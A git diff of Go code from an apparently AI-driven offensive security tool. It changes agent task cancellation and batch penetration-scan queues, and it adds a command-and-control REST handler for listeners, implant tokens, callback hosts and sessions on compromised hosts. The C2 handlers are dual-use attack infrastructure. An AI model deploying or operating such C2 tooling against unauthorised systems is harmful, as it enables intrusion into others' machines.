ok, err := h.tasks.CancelTask(req.ConversationID, ErrTaskCancelled)
|
||||
if req.ContinueAfter {
|
||||
if h.tasks.GetTask(req.ConversationID) == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "未找到正在执行的任务"})
|
||||
return
|
||||
}
|
||||
execID := h.tasks.ActiveMCPExecutionID(req.ConversationID)
|
||||
note := strings.TrimSpace(req.Reason)
|
||||
if execID != "" {
|
||||
if !h.agent.CancelMCPToolExecutionWithNote(execID, note) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "未找到进行中的工具执行或该调用已结束"})
|
||||
return
|
||||
}
|
||||
h.logger.Info("对话页仅终止当前 MCP 工具",
|
||||
zap.String("conversationId", req.ConversationID),
|
||||
zap.String("executionId", execID),
|
||||
zap.Bool("hasNote", note != ""),
|
||||
)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"status": "tool_abort_requested",
|
||||
"conversationId": req.ConversationID,
|
||||
"executionId": execID,
|
||||
"message": "已请求终止当前工具调用;工具返回后本轮推理将继续(与 MCP 监控页终止一致)。",
|
||||
"continueAfter": true,
|
||||
"interruptWithNote": note != "",
|
||||
"continueWithoutTool": false,
|
||||
})
|
||||
return
|
||||
}
|
||||
// 无进行中的 MCP 工具(模型纯推理/流式输出阶段):取消当前上下文并由 Eino 流式处理器合并用户补充后自动续跑。
|
||||
h.tasks.SetInterruptContinueNote(req.ConversationID, note)
|
||||
ok, err := h.tasks.CancelTask(req.ConversationID, multiagent.ErrInterruptContinue)
|
||||
if err != nil {
|
||||
h.logger.Error("中断并继续(无工具)失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if !ok {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "未找到正在执行的任务"})
|
||||
return
|
||||
}
|
||||
h.logger.Info("对话页中断并继续(无 MCP 工具,将自动续跑)",
|
||||
zap.String("conversationId", req.ConversationID),
|
||||
zap.Bool("hasNote", note != ""),
|
||||
)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"status": "interrupt_continue_scheduled",
|
||||
"conversationId": req.ConversationID,
|
||||
"message": "已请求暂停当前推理;用户补充将合并到上下文并自动继续执行(无需整轮停止)。",
|
||||
"continueAfter": true,
|
||||
"interruptWithNote": note != "",
|
||||
"continueWithoutTool": true,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
var cause error = ErrTaskCancelled
|
||||
msg := "已提交取消请求,任务将在当前步骤完成后停止。"
|
||||
ok, err := h.tasks.CancelTask(req.ConversationID, cause)
|
||||
if err != nil {
|
||||
h.logger.Error("取消任务失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
@@ -1739,9 +1848,11 @@ func (h *AgentHandler) CancelAgentLoop(c *gin.Context) {
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"status": "cancelling",
|
||||
"status": "cancelling",
|
||||
"conversationId": req.ConversationID,
|
||||
"message": "已提交取消请求,任务将在当前步骤完成后停止。",
|
||||
"message": msg,
|
||||
"continueAfter": false,
|
||||
"interruptWithNote": false,
|
||||
})
|
||||
}
|
||||
|
||||
@@ -2450,76 +2561,146 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
||||
if assistantMsg != nil {
|
||||
assistantMessageID = assistantMsg.ID
|
||||
}
|
||||
progressCallback := h.createProgressCallback(context.Background(), nil, conversationID, assistantMessageID, nil)
|
||||
// 注意:批量任务没有前端直连的 POST /stream,因此若要支持「刷新后补流」,
|
||||
// 需要把进度事件镜像到 TaskEventBus(GET /api/agent-loop/task-events 会订阅这里)。
|
||||
// progressCallback 将在子任务的 IIFE 内创建,以便拿到 taskCtx/cancelWithCause 与 sendEvent。
|
||||
var progressCallback func(eventType, message string, data interface{})
|
||||
|
||||
// 执行任务(使用包含角色提示词的finalMessage和角色工具列表)
|
||||
h.logger.Info("执行批量任务", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("message", task.Message), zap.String("role", queue.Role), zap.String("conversationId", conversationID))
|
||||
|
||||
// 单个子任务超时时间:从30分钟调整为6小时,适配长时间渗透/扫描任务
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 6*time.Hour)
|
||||
// 存储取消函数,以便在取消队列时能够取消当前任务
|
||||
h.batchTaskManager.SetTaskCancel(queueID, cancel)
|
||||
// 使用队列配置的角色工具列表(如果为空,表示使用所有工具)
|
||||
useBatchMulti := false
|
||||
useEinoSingle := false
|
||||
batchOrch := "deep"
|
||||
am := strings.TrimSpace(strings.ToLower(queue.AgentMode))
|
||||
if am == "multi" {
|
||||
am = "deep"
|
||||
}
|
||||
if am == "eino_single" {
|
||||
useEinoSingle = true
|
||||
} else if batchQueueWantsEino(queue.AgentMode) && h.config != nil && h.config.MultiAgent.Enabled {
|
||||
useBatchMulti = true
|
||||
batchOrch = config.NormalizeMultiAgentOrchestration(am)
|
||||
} else if queue.AgentMode == "" {
|
||||
// 兼容历史数据:未配置队列代理模式时,沿用旧的系统级开关
|
||||
if h.config != nil && h.config.MultiAgent.Enabled && h.config.MultiAgent.BatchUseMultiAgent {
|
||||
func() {
|
||||
// 与对话流式接口一致:同 conversationId 仅允许一个运行中任务,并支持 /api/agent-loop/cancel 与会话锁对齐。
|
||||
baseCtx, cancelWithCause := context.WithCancelCause(context.Background())
|
||||
// 单个子任务超时:6 小时(与原先 WithTimeout(Background) 一致)
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 6*time.Hour)
|
||||
|
||||
registered := false
|
||||
finishStatus := "completed"
|
||||
|
||||
defer func() {
|
||||
h.batchTaskManager.SetTaskCancel(queueID, nil)
|
||||
timeoutCancel()
|
||||
if registered {
|
||||
// 与流式接口保持一致:结束前补一个 done,便于前端 task-events 侧及时收口 UI。
|
||||
if h.taskEventBus != nil {
|
||||
ev := StreamEvent{Type: "done", Message: "", Data: map[string]interface{}{"conversationId": conversationID}}
|
||||
if b, err := json.Marshal(ev); err == nil {
|
||||
h.taskEventBus.Publish(conversationID, append(append([]byte("data: "), b...), '\n', '\n'))
|
||||
}
|
||||
}
|
||||
h.tasks.FinishTask(conversationID, finishStatus)
|
||||
}
|
||||
cancelWithCause(nil)
|
||||
}()
|
||||
|
||||
// 事件镜像:只发布到 TaskEventBus,不直接写 HTTP Response(用于刷新后的补流)。
|
||||
sendEvent := func(eventType, message string, data interface{}) {
|
||||
if h.taskEventBus == nil {
|
||||
return
|
||||
}
|
||||
ev := StreamEvent{Type: eventType, Message: message, Data: data}
|
||||
b, err := json.Marshal(ev)
|
||||
if err != nil {
|
||||
b = []byte(`{"type":"error","message":"marshal failed"}`)
|
||||
}
|
||||
line := make([]byte, 0, len(b)+8)
|
||||
line = append(line, []byte("data: ")...)
|
||||
line = append(line, b...)
|
||||
line = append(line, '\n', '\n')
|
||||
h.taskEventBus.Publish(conversationID, line)
|
||||
}
|
||||
|
||||
if _, err := h.tasks.StartTask(conversationID, task.Message, cancelWithCause); err != nil {
|
||||
h.logger.Warn("批量队列子任务注册会话运行状态失败",
|
||||
zap.String("queueId", queueID),
|
||||
zap.String("taskId", task.ID),
|
||||
zap.String("conversationId", conversationID),
|
||||
zap.Error(err))
|
||||
failMsg := err.Error()
|
||||
if errors.Is(err, ErrTaskAlreadyRunning) {
|
||||
failMsg = "会话已有任务正在执行,无法在该会话上并行启动批量子任务"
|
||||
}
|
||||
h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", failMsg)
|
||||
return
|
||||
}
|
||||
registered = true
|
||||
// 存储取消函数:暂停队列时取消子任务 context(与原先语义一致)
|
||||
h.batchTaskManager.SetTaskCancel(queueID, timeoutCancel)
|
||||
|
||||
// 创建进度回调函数:写 DB + 镜像到 task-events,支持刷新后继续流式展示。
|
||||
progressCallback = h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||
taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks)
|
||||
|
||||
// 使用队列配置的角色工具列表(如果为空,表示使用所有工具)
|
||||
useBatchMulti := false
|
||||
useEinoSingle := false
|
||||
batchOrch := "deep"
|
||||
am := strings.TrimSpace(strings.ToLower(queue.AgentMode))
|
||||
if am == "multi" {
|
||||
am = "deep"
|
||||
}
|
||||
if am == "eino_single" {
|
||||
useEinoSingle = true
|
||||
} else if batchQueueWantsEino(queue.AgentMode) && h.config != nil && h.config.MultiAgent.Enabled {
|
||||
useBatchMulti = true
|
||||
batchOrch = "deep"
|
||||
batchOrch = config.NormalizeMultiAgentOrchestration(am)
|
||||
} else if queue.AgentMode == "" {
|
||||
// 兼容历史数据:未配置队列代理模式时,沿用旧的系统级开关
|
||||
if h.config != nil && h.config.MultiAgent.Enabled && h.config.MultiAgent.BatchUseMultiAgent {
|
||||
useBatchMulti = true
|
||||
batchOrch = "deep"
|
||||
}
|
||||
}
|
||||
}
|
||||
useRunResult := useBatchMulti || useEinoSingle
|
||||
var result *agent.AgentLoopResult
|
||||
var resultMA *multiagent.RunResult
|
||||
var runErr error
|
||||
switch {
|
||||
case useBatchMulti:
|
||||
resultMA, runErr = multiagent.RunDeepAgent(ctx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch)
|
||||
case useEinoSingle:
|
||||
if h.config == nil {
|
||||
runErr = fmt.Errorf("服务器配置未加载")
|
||||
} else {
|
||||
resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(ctx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback)
|
||||
useRunResult := useBatchMulti || useEinoSingle
|
||||
var result *agent.AgentLoopResult
|
||||
var resultMA *multiagent.RunResult
|
||||
var runErr error
|
||||
switch {
|
||||
case useBatchMulti:
|
||||
resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil)
|
||||
case useEinoSingle:
|
||||
if h.config == nil {
|
||||
runErr = fmt.Errorf("服务器配置未加载")
|
||||
} else {
|
||||
resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil)
|
||||
}
|
||||
default:
|
||||
result, runErr = h.agent.AgentLoopWithProgress(taskCtx, finalMessage, []agent.ChatMessage{}, conversationID, progressCallback, roleTools)
|
||||
}
|
||||
default:
|
||||
result, runErr = h.agent.AgentLoopWithProgress(ctx, finalMessage, []agent.ChatMessage{}, conversationID, progressCallback, roleTools)
|
||||
}
|
||||
// 任务执行完成,清理取消函数
|
||||
h.batchTaskManager.SetTaskCancel(queueID, nil)
|
||||
cancel()
|
||||
|
||||
if runErr != nil {
|
||||
if useRunResult {
|
||||
h.persistEinoAgentTraceForResume(conversationID, resultMA)
|
||||
}
|
||||
// 检查是否是取消错误
|
||||
// 1. 直接检查是否是 context.Canceled(包括包装后的错误)
|
||||
// 2. 检查错误消息中是否包含"context canceled"或"cancelled"关键字
|
||||
// 3. 检查 result.Response 中是否包含取消相关的消息
|
||||
errStr := runErr.Error()
|
||||
partialResp := ""
|
||||
if useRunResult && resultMA != nil {
|
||||
partialResp = resultMA.Response
|
||||
} else if result != nil {
|
||||
partialResp = result.Response
|
||||
}
|
||||
isCancelled := errors.Is(runErr, context.Canceled) ||
|
||||
strings.Contains(strings.ToLower(errStr), "context canceled") ||
|
||||
strings.Contains(strings.ToLower(errStr), "context cancelled") ||
|
||||
(partialResp != "" && (strings.Contains(partialResp, "任务已被取消") || strings.Contains(partialResp, "任务执行中断")))
|
||||
if runErr != nil {
|
||||
if useRunResult && shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, resultMA)
|
||||
}
|
||||
// 检查是否是取消错误
|
||||
// 1. 直接检查是否是 context.Canceled(包括包装后的错误)
|
||||
// 2. 检查错误消息中是否包含"context canceled"或"cancelled"关键字
|
||||
// 3. 检查 result.Response 中是否包含取消相关的消息
|
||||
errStr := runErr.Error()
|
||||
partialResp := ""
|
||||
if useRunResult && resultMA != nil {
|
||||
partialResp = resultMA.Response
|
||||
} else if result != nil {
|
||||
partialResp = result.Response
|
||||
}
|
||||
isCancelled := errors.Is(context.Cause(baseCtx), ErrTaskCancelled) ||
|
||||
errors.Is(runErr, context.Canceled) ||
|
||||
strings.Contains(strings.ToLower(errStr), "context canceled") ||
|
||||
strings.Contains(strings.ToLower(errStr), "context cancelled") ||
|
||||
(partialResp != "" && (strings.Contains(partialResp, "任务已被取消") || strings.Contains(partialResp, "任务执行中断")))
|
||||
isTimeout := errors.Is(runErr, context.DeadlineExceeded) || errors.Is(context.Cause(taskCtx), context.DeadlineExceeded)
|
||||
|
||||
if isCancelled {
|
||||
if isTimeout {
|
||||
finishStatus = "timeout"
|
||||
} else if isCancelled {
|
||||
finishStatus = "cancelled"
|
||||
} else {
|
||||
finishStatus = "failed"
|
||||
}
|
||||
|
||||
if isCancelled {
|
||||
h.logger.Info("批量任务被取消", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID))
|
||||
cancelMsg := "任务已被用户取消,后续操作已停止。"
|
||||
// 如果执行结果中有更具体的取消消息,使用它
|
||||
@@ -2528,11 +2709,7 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
||||
}
|
||||
// 更新助手消息内容
|
||||
if assistantMessageID != "" {
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ? WHERE id = ?",
|
||||
cancelMsg,
|
||||
assistantMessageID,
|
||||
); updateErr != nil {
|
||||
if updateErr := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); updateErr != nil {
|
||||
h.logger.Warn("更新取消后的助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(updateErr))
|
||||
}
|
||||
// 保存取消详情到数据库
|
||||
@@ -2546,16 +2723,6 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
||||
h.logger.Warn("保存取消消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(errMsg))
|
||||
}
|
||||
}
|
||||
// 保存代理轨迹(如果存在)
|
||||
if result != nil && (result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "") {
|
||||
if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
|
||||
h.logger.Warn("保存取消任务的代理轨迹失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err))
|
||||
}
|
||||
} else if useRunResult && resultMA != nil && (resultMA.LastAgentTraceInput != "" || resultMA.LastAgentTraceOutput != "") {
|
||||
if err := h.db.SaveAgentTrace(conversationID, resultMA.LastAgentTraceInput, resultMA.LastAgentTraceOutput); err != nil {
|
||||
h.logger.Warn("保存取消任务的代理轨迹失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err))
|
||||
}
|
||||
}
|
||||
h.batchTaskManager.UpdateTaskStatusWithConversationID(queueID, task.ID, "cancelled", cancelMsg, "", conversationID)
|
||||
} else {
|
||||
h.logger.Error("批量任务执行失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID), zap.Error(runErr))
|
||||
@@ -2563,9 +2730,9 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
||||
// 更新助手消息内容
|
||||
if assistantMessageID != "" {
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ? WHERE id = ?",
|
||||
"UPDATE messages SET content = ?, updated_at = ? WHERE id = ?",
|
||||
errorMsg,
|
||||
assistantMessageID,
|
||||
time.Now(), assistantMessageID,
|
||||
); updateErr != nil {
|
||||
h.logger.Warn("更新失败后的助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(updateErr))
|
||||
}
|
||||
@@ -2596,17 +2763,7 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
||||
|
||||
// 更新助手消息内容
|
||||
if assistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(mcpIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(mcpIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
resText,
|
||||
mcpIDsJSON,
|
||||
assistantMessageID,
|
||||
); updateErr != nil {
|
||||
if updateErr := h.db.UpdateAssistantMessageFinalize(assistantMessageID, resText, mcpIDs, multiagent.AggregatedReasoningFromTraceJSON(lastIn)); updateErr != nil {
|
||||
h.logger.Warn("更新助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(updateErr))
|
||||
// 如果更新失败,尝试创建新消息
|
||||
_, err = h.db.AddMessage(conversationID, "assistant", resText, mcpIDs)
|
||||
@@ -2634,6 +2791,7 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
||||
// 保存结果
|
||||
h.batchTaskManager.UpdateTaskStatusWithConversationID(queueID, task.ID, "completed", resText, "", conversationID)
|
||||
}
|
||||
}()
|
||||
|
||||
// 移动到下一个任务
|
||||
h.batchTaskManager.MoveToNextTask(queueID)
|
||||
@@ -2697,6 +2855,10 @@ func (h *AgentHandler) loadHistoryFromAgentTrace(conversationID string) ([]agent
|
||||
if content, ok := msgMap["content"].(string); ok {
|
||||
msg.Content = content
|
||||
}
|
||||
// DeepSeek 思考模式:含工具调用的 assistant 须在后续请求中回传 reasoning_content
|
||||
if rc, ok := msgMap["reasoning_content"].(string); ok && strings.TrimSpace(rc) != "" {
|
||||
msg.ReasoningContent = rc
|
||||
}
|
||||
|
||||
// 解析tool_calls(如果存在)
|
||||
if toolCallsRaw, ok := msgMap["tool_calls"]; ok && toolCallsRaw != nil {
|
||||
@@ -2752,6 +2914,11 @@ func (h *AgentHandler) loadHistoryFromAgentTrace(conversationID string) ([]agent
|
||||
if toolCallID, ok := msgMap["tool_call_id"].(string); ok {
|
||||
msg.ToolCallID = toolCallID
|
||||
}
|
||||
if tn, ok := msgMap["tool_name"].(string); ok && strings.TrimSpace(tn) != "" {
|
||||
msg.ToolName = strings.TrimSpace(tn)
|
||||
} else if tn, ok := msgMap["name"].(string); ok && strings.TrimSpace(tn) != "" && strings.EqualFold(msg.Role, "tool") {
|
||||
msg.ToolName = strings.TrimSpace(tn)
|
||||
}
|
||||
|
||||
agentMessages = append(agentMessages, msg)
|
||||
}
|
||||
@@ -2797,3 +2964,18 @@ func (h *AgentHandler) loadHistoryFromAgentTrace(conversationID string) ([]agent
|
||||
)
|
||||
return agentMessages, nil
|
||||
}
|
||||
|
||||
// dbMessagesToAgentChatMessages maps DB rows to agent ChatMessage for history fallback
|
||||
// (includes reasoning_content for DeepSeek thinking + tool replay).
|
||||
func dbMessagesToAgentChatMessages(msgs []database.Message) []agent.ChatMessage {
|
||||
out := make([]agent.ChatMessage, 0, len(msgs))
|
||||
for i := range msgs {
|
||||
m := msgs[i]
|
||||
out = append(out, agent.ChatMessage{
|
||||
Role: m.Role,
|
||||
Content: m.Content,
|
||||
ReasoningContent: m.ReasoningContent,
|
||||
})
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
@@ -0,0 +1,966 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/c2"
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// C2Handler 处理 C2 相关的 REST API(manager 可在运行时置 nil 以关闭 C2)
|
||||
type C2Handler struct {
|
||||
mgrPtr atomic.Pointer[c2.Manager]
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewC2Handler 创建 C2 处理器;manager 可为 nil(功能关闭时)
|
||||
func NewC2Handler(manager *c2.Manager, logger *zap.Logger) *C2Handler {
|
||||
h := &C2Handler{logger: logger}
|
||||
if manager != nil {
|
||||
h.mgrPtr.Store(manager)
|
||||
}
|
||||
return h
|
||||
}
|
||||
|
||||
func (h *C2Handler) mgr() *c2.Manager {
|
||||
return h.mgrPtr.Load()
|
||||
}
|
||||
|
||||
// SetManager 运行时切换或清空 C2 Manager(与 App 启停同步)
|
||||
func (h *C2Handler) SetManager(m *c2.Manager) {
|
||||
h.mgrPtr.Store(m)
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 监听器 API
|
||||
// ============================================================================
|
||||
|
||||
// ListListeners 获取监听器列表
|
||||
func (h *C2Handler) ListListeners(c *gin.Context) {
|
||||
listeners, err := h.mgr().DB().ListC2Listeners()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
// 移除敏感字段
|
||||
for _, l := range listeners {
|
||||
l.EncryptionKey = ""
|
||||
l.ImplantToken = ""
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"listeners": listeners})
|
||||
}
|
||||
|
||||
// CreateListener 创建监听器
|
||||
func (h *C2Handler) CreateListener(c *gin.Context) {
|
||||
var req struct {
|
||||
Name string `json:"name"`
|
||||
Type string `json:"type"`
|
||||
BindHost string `json:"bind_host"`
|
||||
BindPort int `json:"bind_port"`
|
||||
ProfileID string `json:"profile_id,omitempty"`
|
||||
Remark string `json:"remark,omitempty"`
|
||||
CallbackHost string `json:"callback_host,omitempty"`
|
||||
Config *c2.ListenerConfig `json:"config,omitempty"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
input := c2.CreateListenerInput{
|
||||
Name: req.Name,
|
||||
Type: req.Type,
|
||||
BindHost: req.BindHost,
|
||||
BindPort: req.BindPort,
|
||||
ProfileID: req.ProfileID,
|
||||
Remark: req.Remark,
|
||||
Config: req.Config,
|
||||
CallbackHost: strings.TrimSpace(req.CallbackHost),
|
||||
}
|
||||
|
||||
listener, err := h.mgr().CreateListener(input)
|
||||
if err != nil {
|
||||
code := http.StatusInternalServerError
|
||||
if e, ok := err.(*c2.CommonError); ok {
|
||||
code = e.HTTP
|
||||
}
|
||||
c.JSON(code, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
implantToken := listener.ImplantToken
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
c.JSON(http.StatusOK, gin.H{"listener": listener, "implant_token": implantToken})
|
||||
}
|
||||
|
||||
// GetListener 获取单个监听器
|
||||
func (h *C2Handler) GetListener(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
listener, err := h.mgr().DB().GetC2Listener(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if listener == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"})
|
||||
return
|
||||
}
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
c.JSON(http.StatusOK, gin.H{"listener": listener})
|
||||
}
|
||||
|
||||
// UpdateListener 更新监听器
|
||||
func (h *C2Handler) UpdateListener(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
listener, err := h.mgr().DB().GetC2Listener(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if listener == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"})
|
||||
return
|
||||
}
|
||||
|
||||
var req struct {
|
||||
Name string `json:"name"`
|
||||
BindHost string `json:"bind_host"`
|
||||
BindPort int `json:"bind_port"`
|
||||
ProfileID string `json:"profile_id"`
|
||||
Remark string `json:"remark"`
|
||||
CallbackHost *string `json:"callback_host"`
|
||||
Config *c2.ListenerConfig `json:"config,omitempty"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 若监听器在运行,不能修改关键字段
|
||||
if h.mgr().IsListenerRunning(id) {
|
||||
if req.BindHost != listener.BindHost || req.BindPort != listener.BindPort {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": "cannot modify bind address while listener is running"})
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
listener.Name = req.Name
|
||||
listener.BindHost = req.BindHost
|
||||
listener.BindPort = req.BindPort
|
||||
listener.ProfileID = req.ProfileID
|
||||
listener.Remark = req.Remark
|
||||
if req.Config != nil {
|
||||
cfgJSON, _ := json.Marshal(req.Config)
|
||||
listener.ConfigJSON = string(cfgJSON)
|
||||
}
|
||||
if req.CallbackHost != nil {
|
||||
cfg := &c2.ListenerConfig{}
|
||||
raw := strings.TrimSpace(listener.ConfigJSON)
|
||||
if raw == "" {
|
||||
raw = "{}"
|
||||
}
|
||||
_ = json.Unmarshal([]byte(raw), cfg)
|
||||
cfg.CallbackHost = strings.TrimSpace(*req.CallbackHost)
|
||||
cfg.ApplyDefaults()
|
||||
cfgJSON, err := json.Marshal(cfg)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
listener.ConfigJSON = string(cfgJSON)
|
||||
}
|
||||
|
||||
if err := h.mgr().DB().UpdateC2Listener(listener); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
c.JSON(http.StatusOK, gin.H{"listener": listener})
|
||||
}
|
||||
|
||||
// DeleteListener 删除监听器
|
||||
func (h *C2Handler) DeleteListener(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if err := h.mgr().DeleteListener(id); err != nil {
|
||||
code := http.StatusInternalServerError
|
||||
if e, ok := err.(*c2.CommonError); ok {
|
||||
code = e.HTTP
|
||||
}
|
||||
c.JSON(code, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"deleted": true})
|
||||
}
|
||||
|
||||
// StartListener 启动监听器
|
||||
func (h *C2Handler) StartListener(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
listener, err := h.mgr().StartListener(id)
|
||||
if err != nil {
|
||||
code := http.StatusInternalServerError
|
||||
if e, ok := err.(*c2.CommonError); ok {
|
||||
code = e.HTTP
|
||||
}
|
||||
c.JSON(code, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
c.JSON(http.StatusOK, gin.H{"listener": listener})
|
||||
}
|
||||
|
||||
// StopListener 停止监听器
|
||||
func (h *C2Handler) StopListener(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if err := h.mgr().StopListener(id); err != nil {
|
||||
code := http.StatusInternalServerError
|
||||
if e, ok := err.(*c2.CommonError); ok {
|
||||
code = e.HTTP
|
||||
}
|
||||
c.JSON(code, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"stopped": true})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 会话 API
|
||||
// ============================================================================
|
||||
|
||||
// ListSessions 获取会话列表
|
||||
func (h *C2Handler) ListSessions(c *gin.Context) {
|
||||
filter := database.ListC2SessionsFilter{
|
||||
ListenerID: c.Query("listener_id"),
|
||||
Status: c.Query("status"),
|
||||
OS: c.Query("os"),
|
||||
Search: c.Query("search"),
|
||||
}
|
||||
if limit := c.Query("limit"); limit != "" {
|
||||
if n, err := strconv.Atoi(limit); err == nil && n > 0 {
|
||||
filter.Limit = n
|
||||
}
|
||||
}
|
||||
|
||||
sessions, err := h.mgr().DB().ListC2Sessions(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"sessions": sessions})
|
||||
}
|
||||
|
||||
// GetSession 获取单个会话
|
||||
func (h *C2Handler) GetSession(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
session, err := h.mgr().DB().GetC2Session(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if session == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "session not found"})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取最近任务
|
||||
tasks, _ := h.mgr().DB().ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: id,
|
||||
Limit: 20,
|
||||
})
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"session": session,
|
||||
"tasks": tasks,
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteSession 删除会话
|
||||
func (h *C2Handler) DeleteSession(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if err := h.mgr().DB().DeleteC2Session(id); err != nil {
